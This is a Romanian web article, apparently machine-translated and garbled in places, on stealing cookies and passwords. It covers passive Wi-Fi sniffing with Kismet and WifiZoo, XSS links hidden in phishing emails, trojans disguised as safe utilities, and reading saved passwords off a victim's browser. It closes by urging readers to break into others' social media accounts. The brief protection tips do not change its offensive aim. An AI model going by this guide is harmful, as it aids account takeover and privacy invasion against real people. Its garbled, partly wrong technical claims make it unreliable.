Acum să trecem la software-ul necesar. Am folosit kismet pentru descoperirea rețelei și WifiZoo pentru interceptarea cookie-urilor. Mă voi opri în detaliu asupra celui de-al doilea program. WifiZoo este un scaner pasiv de unde radio și colectează destul de multe informatii utile, cum ar fi: pop3, trafic smtp, cookie http/authinfo, msn, acreditări ftp, trafic de rețea telnet, nbt etc. Singurul dezavantaj al acestui program este lipsa modului Channel Hopping, WifiZoo doar ascultă interfață fără fir, și nu pot, ca să spunem așa, să sară de la un canal la altul. Dar acest dezavantaj este compensat de un alt program, Kismet, care acceptă acest mod. Pentru a porni WifiZoo veți avea nevoie de:

  • piton
  • scapy
  • Kismet

Deci, să lansăm programul, mai întâi să lansăm Kismet pentru a susține modul de salt al canalului, apoi lansăm direct WifiZoo, următoarea fereastră ar trebui să apară în fața ta:

Acum rămâne doar să stai și să aștepți până interceptezi ceva tot ce interceptează programul poate fi găsit în jurnalele, care se află în directorul cu programul /logs/. De asemenea, puteți lansa o interfață GUI care se conectează automat la http la 127.0.0.1:8000

Nu voi scrie despre toate caracteristicile acestui program minunat, cred că vă veți da seama de celelalte caracteristici și, pentru că momentan, ne interesează doar cookie-uri. Faceți clic pe linkul care spune cookie-uri și vedeți ce am interceptat:

Modalități de a fura biscuiți

Această metodă de hacking, furtul cookie-urilor, funcționează excelent și este folosită de mulți hackeri. Dacă vrei să-l încerci și tu, dar nu știi ce să faci, citește recomandările noastre.

Ce sunt cookie-urile?

Acestea sunt informații despre vizita unui utilizator pe un anumit site. Este depozitat într-un loc separat document text. Acolo puteți găsi o varietate de informații. Inclusiv date de conectare, parole, adrese cutiile poştale si numere de telefon. De aceea, spărgătorii se străduiesc să pună mâna pe aceste documente. Pentru a fura materialele de care au nevoie, hackerii recurg la diferite metode.

Modalități de a fura biscuiți

Vulnerabilitatea XSS

Poate fi găsit și folosit pe orice site web. Când un specialist găsește o vulnerabilitate, o implementează cod special. În funcție de scop, codurile sunt diferite, sunt scrise pentru o anumită resursă. Când un utilizator vizitează această pagină și o reîmprospătează, toate modificările sunt aplicate. Codul începe să acționeze - este încorporat în computerul victimei și colectează totul informatiile necesare din browser.

Pentru a introduce cod, puteți folosi orice tip de vulnerabilitate - o eroare într-o resursă web, într-un browser sau într-un sistem informatic.

Există 2 tipuri de atacuri XSS:

Pasiv - direcționat către scriptul paginii. În acest caz, trebuie să căutați vulnerabilități în elementele paginii. De exemplu, o filă de dialog, o casetă de căutare, un catalog video etc.

Activ - ar trebui să le cauți pe server. Sunt frecvente în special pe diverse forumuri, bloguri și chat-uri.

Cum să forțezi o persoană să aplice XSS?

Sarcina nu este ușoară, deoarece adesea pentru a activa codul trebuie să faceți clic pe linkul cu acesta. Puteți ascunde linkul și îl puteți trimite într-un e-mail împreună cu o ofertă interesantă. De exemplu, oferă o reducere mare într-un magazin online. De asemenea, puteți implementa toate acestea în imagine. Cel mai probabil, utilizatorul îl va vedea și nu va bănui nimic.

Instalarea unui sniffer

Aceasta este o implementare programe specializate pentru a monitoriza traficul pe dispozitivul altcuiva. Sniffer-ul vă permite să interceptați sesiunile transmise cu datele altor persoane. În acest fel, puteți obține toate datele de conectare și parolele, adresele, orice informatii importante transmis prin rețea de către utilizator. În acest caz, atacurile sunt cel mai adesea efectuate asupra datelor HTTP neprotejate. Wi-Fi nesecurizat funcționează bine pentru asta.

Există mai multe moduri de a implementa un sniffer:

  • Copierea traficului;
  • Analiza datelor folosind atacuri de trafic;
  • Ascultarea interfețelor;
  • Introducerea unui sniffer într-o pauză de canal.
Înlocuirea cookie-urilor

Toate datele sunt stocate pe serverul web în forma sa originală. Dacă le schimbați, aceasta va fi considerată o înlocuire. Toate materialele primite pot fi folosite pe alt computer. Astfel vei avea acces deplin la datele personale ale utilizatorului. Puteți modifica cookie-urile utilizând setările browserului, suplimentele sau programele speciale. Editarea este posibilă și în orice blocnotes standard de pe un computer.

Furtul cookie-urilor folosind un virus

Experții sfătuiesc să nu folosiți cookie-uri decât dacă există o nevoie specială pentru el. Dacă este posibil să le dezactivați, este mai bine să faceți acest lucru. Acest lucru se datorează faptului că cookie-urile sunt foarte vulnerabile. Ele sunt adesea furate de criminali. O cantitate imensă de informații personale poate fi obținută din aceste fișiere. informații confidențiale, care va fi folosit împotriva unei persoane. Cel mai periculos tip de fișiere sunt cele care rămân în sistem după ce sesiunea sa încheiat deja.

Cookie-urile sunt adesea furate folosind un utilitar antivirus. Acest lucru se face destul de simplu. Orice utilitar sigur este încorporat cu un virus care colectează anumite materiale de pe computer. Programul virus va fi conectat la serverul proprietarului său. Programul trebuie configurat astfel încât browserul să-l folosească ca server proxy.

Când programul ajunge pe PC-ul victimei, va începe automat să colecteze toate datele stocate și să vi le trimită.

Virușii sunt diferiți, funcțiile lor pot diferi și ele. Unele vă permit să controlați complet browserul și să vizualizați orice informație. Alții sunt capabili să fure materiale protejate. Alții colectează doar date nesecurizate.

Este posibil să aveți dificultăți la introducerea unui program de virus pe computerul altcuiva. Este necesar să forțați utilizatorul să îl descarce și să îl ruleze. Aici puteți fie să îi trimiteți o scrisoare cu un link către program, fie să treceți programul drept sigur și să așteptați ca persoana respectivă să îl descarce de pe site-ul dvs. web.

Cum să protejăm cookie-urile de furt?

Majoritatea resurselor web nu sunt suficient de protejate. Hackerii găsesc cu ușurință vulnerabilități și erori în aceste platforme.

Reguli de protecție a cookie-urilor:

  1. Conectați ID-ul computerului la sesiunea curentă. Apoi, când vă conectați pe site de pe un dispozitiv terță parte, va fi pornită o nouă sesiune, iar datele de la cea anterioară nu vor fi preluate.
  2. Conectați sesiunea la browser. Același principiu va funcționa ca și în paragraful anterior.
  3. Criptați parametrii trimiși prin rețea. Atunci informațiile stocate în document nu vor fi de înțeles. Va fi inutil celui care l-a interceptat. Această tehnică nu vă va proteja 100% unii specialiști pot decripta orice materiale.
  4. Creați un folder separat pentru identificatori.

Cum să aflați parola pentru contul altcuiva prin cookie-uri?

Pentru a obține datele de conectare ale altcuiva, trebuie mai întâi să ajungeți la fișierul în care a fost salvat.

Pentru cei care folosesc Mozilla Firefox trebuie să accesați fila instrumente, care se află în meniul principal. În continuare, în setările sistemului veți găsi secțiunea „Protecție”, unde ar trebui să căutați toate informațiile importante despre conturile de pe rețelele sociale. Toate parolele sunt ascunse, așa că faceți clic pe butonul „afișare”. Puteți instala imediat protecția și puneți un cod special. Atunci nimeni în afară de tine nu va primi aceste informații.

În Opera, numai numele de utilizator sunt disponibile pentru vizionare publică. Dar în meniu puteți găsi un manager de parole și puteți vedea tot ce este stocat pe computer. Lista completă este în manager. Pentru a obține acces la parole, trebuie să instalați o extensie suplimentară.

ÎN Google Chrome Toate aceste materiale pot fi văzute în setările avansate. Există o filă cu toate cookie-urile salvate.

Din păcate, browser standard Internet Explorer nu are astfel de functii. Pentru a afla informații despre platformele web pe care le vizitează proprietarul PC-ului, trebuie să descărcați un program special. Îl puteți găsi pe Internet gratuit, este complet sigur, dar este mai bine să îl descărcați din surse de încredere. Nu uitați că orice program trebuie scanat de un antivirus. Acest lucru este valabil mai ales pentru acele utilitare care funcționează cu parole.

Această tehnică este potrivită numai pentru cei care au acces fizic la computerul victimei. De asemenea, puteți afla parola altcuiva dacă persoana sa conectat la platformă prin intermediul computerului dvs. și și-a salvat datele.

Programe pentru furtul cookie-urilor

Există multe forumuri de hackeri pe Internet în care hackerii comunică între ei. Oamenii merg acolo sperând să primească ajutor gratuit. Acolo puteți găsi un număr mare de programe diferite pentru hacking. Dorim să vă avertizăm că nu trebuie să aveți încredere în aceste programe. Utilitățile pentru furtul de la distanță cookie-uri de pe dispozitivul altcuiva sunt manechine sau programe viruși. Dacă descărcați acest software pe computer, cel mai probabil veți cădea în capcana unui escroc. Escrocii postează programe gratuit. Astfel, ei distribuie software viruși și câștigă controlul asupra computerelor altor persoane. În general, astfel de programe sunt o înșelătorie, veți înțelege acest lucru după interfața și conținutul lor. Dacă aveți de gând să utilizați orice software pentru a extrage fișiere, atunci lăsați-l să fie sniffers. Desigur, folosirea lor nu este atât de ușoară. Și să găsești un bun sniffer pe Internet nu este ușor. Dar un astfel de software este disponibil de la specialiști care ți-l pot vinde pentru bani. Amintiți-vă că există mulți escroci, fiecare cu trucurile lui. Ar trebui să aveți încredere doar în hackeri de încredere care au o bună reputație, au recenzii și au propriul lor site web.

În concluzie, aș dori să observ că furtul cookie-urilor este o metodă cu adevărat puternică, a cărei eficacitate este foarte mare. Dacă doriți să spargeți profilul cuiva pe o rețea de socializare sau mesagerie instant, asigurați-vă că luați în considerare această opțiune. Această metodă funcționează cel mai bine atunci când puteți utiliza computerul victimei. Este mult mai dificil să obții materiale de la distanță, dar poți folosi sfaturile noastre și poți încerca să pui în practică această metodă.

In sectiunea



 


Citire:



Ce să faci dacă evoluezi offline

Ce să faci dacă evoluezi offline

În cele din urmă, ea a vizitat piața de jocuri pe computer, luminând-o cu lumina monștrilor extratereștri și a armelor high-tech. Desigur, un astfel de neobișnuit...

Testarea procesorului pentru supraîncălzire

Testarea procesorului pentru supraîncălzire

Trebuie să monitorizați în mod constant temperatura procesorului sau a plăcii video, deoarece dacă se supraîncălzi, computerul pur și simplu nu va porni. Pe aceasta...

Ce sunt serviciile publice Yesia

Ce sunt serviciile publice Yesia

Au dispărut vremurile în care primirea serviciilor de stat sau municipale nu era posibilă fără o vizită personală la executiv...

Poziția capetelor pe antenă

Poziția capetelor pe antenă

Articolul dezvăluie principalele metode de determinare a azimutului folosind o busolă magnetică și locurile de utilizare posibilă a acestuia. Utilizare...

imagine-alimentare RSS